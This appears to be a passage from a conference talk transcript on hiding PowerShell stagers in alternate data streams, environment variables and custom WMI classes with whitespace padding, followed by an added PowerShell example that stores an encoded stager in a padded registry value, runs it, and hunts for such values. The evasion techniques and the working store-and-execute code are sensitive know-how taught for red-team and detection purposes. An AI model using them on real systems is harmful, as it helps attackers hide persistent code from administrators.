Cool, so I added in roughly 40 or so blank spaces, and then we'll be able to actually write it there. So we'll execute that. Cool, now we'll come back in here and we'll look at it, and we see it's now off the screen. Awesome. If we want to actually call upon it, or just read it, we'll see something like that: we have all this blank space and our code. If an admin's reading group policy objects utilizing the command line like this, our mileage will vary, but when it's time for us to execute, you guessed it, we can trim everything and be good to go.

From a hosts file perspective, I'm gonna just call in, or read in, that string, and then I'm going to add content to that file with a value of my base64 code, and I'm gonna add it to a stream called zones. Why zones? Because it felt good on my soul. When you look at this, right, just looking at what ADSes are there, we'll see something like this, and if somebody's looking, that $DATA is gonna be the default one, and I just added in zones because it felt good, it looked good, smelled good, all that good stuff. So now I'm going to read in that data and then I'm going to pass that to PowerShell so I can actually have it execute. All right, all right, all right.

So we got two more. The second to last one here is going to be dealing with environment variables. So when I utilize PowerShell to affect environment variables, I'm going to create one, but it doesn't persist past my current session, and I'm also gonna create a system one, but the system needs to restart before it kicks in. So this first one is creating a temporary one, and then that second one creates my permanent one, but it again won't kick in until the system restarts. What I'm gonna do is come back over here and really look at where that's at. So I have a number of things that are there, and we see the one that we created there. There was already a W6432, so I created a W64 'cause it felt good, but again it stands out if somebody's looking at this, so we're gonna pad it with some whitespace. Awesome. Come back in here, look at it, and now we have this ugly blank one. So instead of us doing "value not set" here, I'm gonna use a donor, if you will: I'm just gonna copy what 6432 has as its entry, also save it here, and still have my whitespace and push down my actual code. So I'll read in what 6432 has and then I'll execute nearly the same thing, starting that entry off with the code that 6432 has. And when we look at that, we see our W64 with the same thing as 6432, and if we were to open it up and interact with it, we have our code, we have some whitespace, and then we have C:\Program Files\Common Files. Ultimately, I want an admin, if they're gonna investigate this, I want them to feel like there's nothing to see here, just keep moving, right? I also want to be a snitch and be like, hey man, don't look at this event code, um, go look at, I'm sorry, this registry key, don't look at that one over there, that's who you're really looking for. When it's time for me to run it, trim my whitespace and be good to go.

From a WMI perspective, again, roughly 10,000 on my machine. I'm going to create one called Win32Defend64, 'cause largely a decent amount of the classes begin with Win32, so I want this to blend in. I'm going to create a property called Path and I'm gonna store my code there, and then when I go back to read it I'll be able to see my code. Now this class is one of 10,000-plus entries on this system. When it's time for me to execute it, I just call upon it. Now, I don't feel like I need to further obfuscate that. If somebody wanted to actually look at these classes a little bit deeper and they knew which one they were looking at, they could actually use this program inherent to Windows, and from here they could specify recursively all roughly 10,000 or so, or they can do the immediate ones in that namespace, and from that perspective they can then scroll down to something that they're looking for, maybe get to a point where they see Win32Defend64. Notice we don't see our code there, and if they had a wild hair they could then interact with it, come down, and they would see the property which we've created. Lots of work. That's good.

All right, so as you see there's a number of ways for us to do this. Now you may be wondering, well, are people really using this? Hey, look, from an objective perspective, oh, don't trust what I'm saying, let's look at what the data says, right? So we have a number of organizations, nation-states, hacktivists, whatever you want to call them, that are utilizing stagers in some form or fashion, all right, and this is just a small list. When you think about it, it only makes sense: like, why go all in when you can kind of taste the water a little bit to make sure it's what you want before you put your hard-earned equity on that actual system?

Now we do have some pros and we have some cons. So the pros: very lightweight; could be low equity, absolutely, because again, if I lose that, what do I lose? A domain, maybe an IP address, maybe, you know, just a name of what I call the file, and that doesn't even mean anything. It's modular, so I have this stager that literally goes and has one job, and then depending on what it brings back to me for information, I could have a module that then surveys, I have a module that's a keylogger, I have a module that does this, that, this, right? So it's very modular in nature, where I don't have to bring everything at one time. And literally my C2 server could be hosted anywhere, the same with my stager. It's like, if there is a place for me to store it in Windows, and there is a million places, they call it features, um, it's a place in which I can go back and grab it.

Now with that, there's some work that has to be done to even get to this thing. We're talking post-exploitation, so if you can't even get in the door, you won't even get to the point of using it. And some defenders are better than others, we can all agree with that. So as we begin to use this, really, it's visible: the next stage of our retrieval is going to create a connection, so if there's real decent logging and somebody is actually looking, it could highlight. If the organization has a good EDR we could be seen as well, right? This is where you understand the environment and then you pick which tool is applicable to the task at hand. We could find ourselves in a place in which our C2 server is blocked if we're using a domain, or really even an IP. If we're using a domain and the organization finds it, they could sinkhole the domain and really neuter our communication. So there's a lot riding on using a stager.

From that perspective, some detection and mitigation strategies. Well, proactive threat hunting: like, come to work and actively go look at stuff on your network. Assume breach: well, it's quiet; that's because they're good. I'm telling you, if you go look, you'll find stuff, all right? Reputation-based web analysis: what does the rest of the community think about this domain, or this file, or whatever the case? What does the rest of my organization think about it, in the sense of, is this file resident somewhere else on my systems? Mitigations: least privilege, segmentation, isolation, application whitelisting; it hurts, man, but if you do it it's worthwhile, right? Somebody still can do some nefarious stuff, but at the end of the day we're making it harder for them. It goes without saying: patch, patch, patch.

All right, so cool, now I'm on the downstream, right, making my descent down, and I gotta get these shameless plugs out, right? It is what it is, I apologize, right? So you see me use a lot of PowerShell; you guessed it, I like PowerShell. So I run a site called Under the Wire (underthewire.tech), myself and two other people, and it's been around roughly since 2015. We've had over 90,000 people play from 78 countries. When I Google how many countries there are, I get somewhere between 192 and 196; either way, I'm pretty happy with those stats. It's free and it's persistent, and it's going after the core aspects of the language. So if you're looking to utilize the language a little bit more, because you maybe thought what I was using it for was pretty cool, then here's a way to kind of get after it. Now if you feel like you know the language, I also run a site called PoSH Hunter. So PoSH Hunter is very offense- and defense-minded: I'm gonna put you in a scenario in which you're either a defender or you're a vulnerability/penetration tester, and you're going to answer questions utilizing an operating system, or a Windows instance, that we're providing. All right, so if you have questions, I'll step off to the side and answer them. If there is anything that you want to take a picture of, this is it. When I get back home to Augusta tonight I'm gonna put these slides up there; if you want to interact with me on Twitter or anything, there's that, and there's my code. So again, I'm gonna step off to the side, so if there's any questions I'll take them. Thank you. [Applause]
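The pad-and-trim round trip the talk walks through, as an added PowerShell example; this is not the speaker's demo code. It uses the registry store because it needs no domain or admin rights, but the same store/strip/execute pattern applies to the AD attribute, event log, GPO description, alternate data stream and environment variable stores from the talk; only the read and write cmdlets change. The key path (`HKCU:\Software\Demo\Console`), the value name `appcache32`, the 250-space pad and the toy stager are assumptions. The last function is the hunting side the talk argues for: it reads raw value data rather than the regedit column, so a decoy prefix and off-screen padding do not help the attacker.

```powershell
# Added example (not from the talk). Stores a base64-encoded PowerShell stager
# behind a decoy prefix and whitespace padding in a registry value, reads it
# back, strips the padding and runs it with -EncodedCommand. Then hunts the
# same key for values that hide text behind long whitespace runs.

$Root   = 'HKCU:\Software\Demo'           # assumption: any writable key works
$Key    = "$Root\Console"
$Name   = 'appcache32'                    # assumption: name chosen to blend in
$Prefix = '(value not set)'               # mimics what regedit shows for (Default)
$Pad    = ' ' * 250                       # pushes the payload off the visible column

# Toy stager (assumption): the talk's proof is a text file on the desktop.
# A real stager would fetch the next stage; this one only proves execution.
$Stager = 'Set-Content -Path (Join-Path $env:USERPROFILE "Desktop\proof.txt") -Value "stager test"'

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # powershell.exe -EncodedCommand expects base64 of UTF-16LE, not UTF-8
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function Set-PaddedValue {
    param([string]$Path, [string]$ValueName, [string]$Base64)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    # decoy text + padding + payload, written as a plain REG_SZ string
    New-ItemProperty -Path $Path -Name $ValueName -PropertyType String `
        -Value ($Prefix + $Pad + $Base64) -Force | Out-Null
}

function Get-PaddedValue {
    param([string]$Path, [string]$ValueName)
    $raw = (Get-ItemProperty -Path $Path -Name $ValueName).$ValueName
    # drop the decoy prefix and every whitespace run; base64 contains neither
    ($raw -replace [regex]::Escape($Prefix), '') -replace '\s', ''
}

function Invoke-StoredStager {
    param([string]$Path, [string]$ValueName)
    $b64 = Get-PaddedValue -Path $Path -ValueName $ValueName
    & powershell.exe -NoProfile -NonInteractive -EncodedCommand $b64
}

# Defender's side: flag values whose raw data contains a long whitespace run
# or a long base64-looking token, regardless of what the GUI column shows.
function Find-PaddedRegistryValues {
    param([string]$Path, [int]$MinPad = 40)
    $item = Get-Item -Path $Path
    foreach ($n in $item.GetValueNames()) {
        $data    = [string]$item.GetValue($n)
        $compact = $data -replace '\s', ''
        $pad     = $data -match "\s{$MinPad,}"
        $b64     = $compact -match '[A-Za-z0-9+/]{100,}={0,2}'
        if ($pad -or $b64) {
            [pscustomobject]@{
                Key            = $Path
                Value          = if ($n) { $n } else { '(Default)' }
                Length         = $data.Length
                LongWhitespace = $pad
                Base64Like     = $b64
                Head           = $compact.Substring(0, [Math]::Min(40, $compact.Length))
            }
        }
    }
}

# Demo: store, hunt, execute, verify the proof file, then clean up.
$encoded = ConvertTo-EncodedCommand -Script $Stager
Set-PaddedValue -Path $Key -ValueName $Name -Base64 $encoded
Find-PaddedRegistryValues -Path $Key | Format-List
Invoke-StoredStager -Path $Key -ValueName $Name
Test-Path (Join-Path $env:USERPROFILE 'Desktop\proof.txt')   # True once the stager ran
Remove-Item -Path $Root -Recurse -Force
```

Two practitioner notes. First, the decoy-plus-padding trick only defeats a human looking at a truncated GUI column; any collector that pulls raw value data (Sysmon registry events, a baseline diff, or the hunting function above) sees the whole string, and a 250-space run followed by a few hundred base64 characters is itself a strong indicator. Second, the execution step is where the stager is most exposed: `powershell.exe -EncodedCommand` with a long base64 argument shows up in process-creation logging and script block logging regardless of where the payload was parked, which is the detection point the talk's "good EDR" remark is pointing at.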